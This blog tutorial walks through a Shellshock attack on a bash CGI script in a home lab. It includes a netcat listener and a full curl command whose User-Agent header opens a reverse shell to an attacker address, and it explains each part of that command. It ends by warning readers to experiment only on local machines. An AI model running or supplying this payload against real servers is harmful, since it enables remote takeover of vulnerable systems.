by Anshuman    May 16, 2019

CGI runs bash as their default request handler and this attack does not require any authentication that’s why most of the attack is taken place on CGI pages to exploit this vulnerability.

So let’s create a CGI script called "helloworld.cgi" and this script we will create under /usr/lib/cgi-bin directory.

Now let’s write a very simple hello world script and save it. Set its permission to 755 (so it is executable)

To test this go to the browser and type this URL:- http://localhost/cgi-bin/helloworld.cgi and hit enter.

So here you can see it printed Hello World so there is no problem in our script now we have created one CGI script on the victim machine. Now let’s move on to Attacker machine.So here you can see it printed Hello World so there is no problem in our script now we have created one CGI script on the victim machine. Now let’s move on to Attacker machine.

So here I am running Ubuntu 18.04 Operating System and from this system, I’ll lunch my attack to victim machine through the reverse shell.

What is a reverse shell?

A reverse shell is a shell process which will start on a machine, and its input and output are controlled by an attacker from a remote computer. And always, the shell runs on the victim’s machine, but it will take the input from the attacker machine and also prints its output on the attacker’s machine. Reverse shell will give the attacker a convenient way to run commands on a compromised machine.

So Here you can see I am running two terminals and in one terminal I’ll enter the netcat command and wait for the connection. And in the second terminal, I’ll execute the curl command to connect with the bash.

And nc -l 9000 -v command I’ll use for TCP connection.

If you want to know more about netcat then please follow these below links.

Netcat:-

And in the second terminal, I will execute the curl command to starts a bash shell on the server machine.

Command

curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1"http://192.168.2.18/cgi-bin/helloworld.cgi

Victim machine IP Address - 192.168.2.18

Attacker Machine IP Address — 192.168.2.13

Port Number - 9000 - (Any number you can use it’s only used for TCP Connection)

Don’t worry I’ll explain each & every command.

1."/bin/bash -i": The option I stands for interactive, meaning that the shell must be interactive (must provide a shell prompt).

2."> /dev/tcp/192.168.2.13/9000": This causes the output device (stdout) of the shell to be redirected to the TCP connection to 192.168.2.13’s port 9000. In Unix systems, stdout’s file descriptor is 1.

3."0<&1": File descriptor 0 represents the standard input device (stdin). This option tells the system to use the standard output device as the standard input device. Since stdout is already redirected to the TCP connection, this option basically indicates that the shell program will get its input from the same TCP connection.

4."2>&1": File descriptor 2 represents the standard error stderr. This causes the error output to be redirected to stdout, which is the TCP connection.

In summary, the command "/bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1" starts a bash shell on the server machine, with its input coming from a TCP connection, and output going to the same TCP connection.

When the bash shell command is executed on 192.168.2.18, it connects back to the netcat process started on 192.168.2.13. This is confirmed via the "Connection from 192.168.2.13 port 9000 [tcp/*] accepted" message displayed by netcat.

Now hit enter here you can see Connection from 192.168.2.18 44159 received! means now attacker successfully connected to a victim’s machine and you can see here attacker now able see all of his machine details from his terminal.

We successfully did shellshock attack on a remote server. Now let’s type ls command to check what are the files the Victim has inside /usr/lib/cgi-bin directory.

As you can see from the screenshot attacker can also see helloworld.cgi file and this file has been created from the victim’s machine now whatever changes victim will do then the attacker can also see all the changes.

So in this way, if CGI scripts run older bash then by reverse shell we can easily take over that machine.

Note

Please do this experiment on your local machine only means you can use a virtual box and run older Linux OS which is vulnerable and do your experiments but never ever try on live machines because if that machine is running older bash then you can easily take over that system. And you will definitely face legal actions so I’ll highly recommend to try on your local machine only.

I hope you guys like this post-bye bye for now.

Happy Hacking :)

WEB HACKING